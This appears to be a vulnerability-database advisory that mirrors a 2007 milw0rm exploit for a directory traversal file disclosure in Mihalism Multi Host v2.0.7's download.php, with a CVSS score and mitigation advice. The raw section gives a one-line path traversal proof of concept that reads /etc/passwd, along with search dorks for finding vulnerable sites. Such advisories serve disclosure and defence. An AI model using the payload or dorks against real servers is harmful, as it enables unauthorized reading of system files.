Mihalism Multi Host v2.0.7 download.php Remote File Disclosure Vuln

vendor:

Mihalism Multi Host

by:

Unknown

7.5

CVSS

HIGH

Remote File Disclosure

CWE

Product Name: Mihalism Multi Host

Affected Version From: Mihalism Multi Host v2.0.7

Affected Version To: Mihalism Multi Host v2.0.7

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Mihalism Multi Host v2.0.7 download.php Remote File Disclosure Vuln

The vulnerability allows an attacker to disclose files on the remote server by exploiting the 'download.php' script. By manipulating the 'file' parameter and using directory traversal techniques, an attacker can access sensitive files such as the '/etc/passwd' file.

Mitigation:

To mitigate this vulnerability, the 'download.php' script should be properly validated and sanitized to prevent directory traversal attacks. Additionally, access control should be implemented to restrict unauthorized access to sensitive files.

Source

Exploit-DB raw data:

    ########                  ######              ####                ######  ######
  ##      ##                    ##                  ##                  ####  ####  
  ##              ######        ##            ####  ##                  ####  ####  
  ##            ##      ##      ##          ##    ####                  ##  ##  ##  
  ##    ######  ##      ##      ##    ##    ##      ##                  ##      ##  
  ##      ##    ##      ##      ##    ##    ##      ##                  ##      ##  
    ######        ######      ##########      ##########              ######  ######
                                                        ##############              

####################################################################################
###### Mihalism Multi Host v2.0.7 download.php Remote File Disclosure Vuln     #####
###### Script Page :  :(                                                       #####
###### POC :                                                                   #####
###### /Script/download.php?file=../../../../../../../../../../../etc/passwd   #####
###### D0rkS :                                                                 #####
###### Powered by Mihalism Multi Host v2.0.7                                   #####
###### Powered by Mihalism Multi Host v2.0.5                                   #####
###### Powered by Mihalism Multi Host v2.0.4                                   #####
###### Powered by Mihalism Multi Host v2.0.3 MBF                               #####
###### Powered by Mihalism Multi Host v3.1.1 Final                             #####
###### GREETZ TO :                                                             #####
###### TrYaG-TeaM , H-T Team , RoMaNcYxHaCkEr , Asb-May's Team & ALL           #####
####################################################################################

# milw0rm.com [2007-12-30]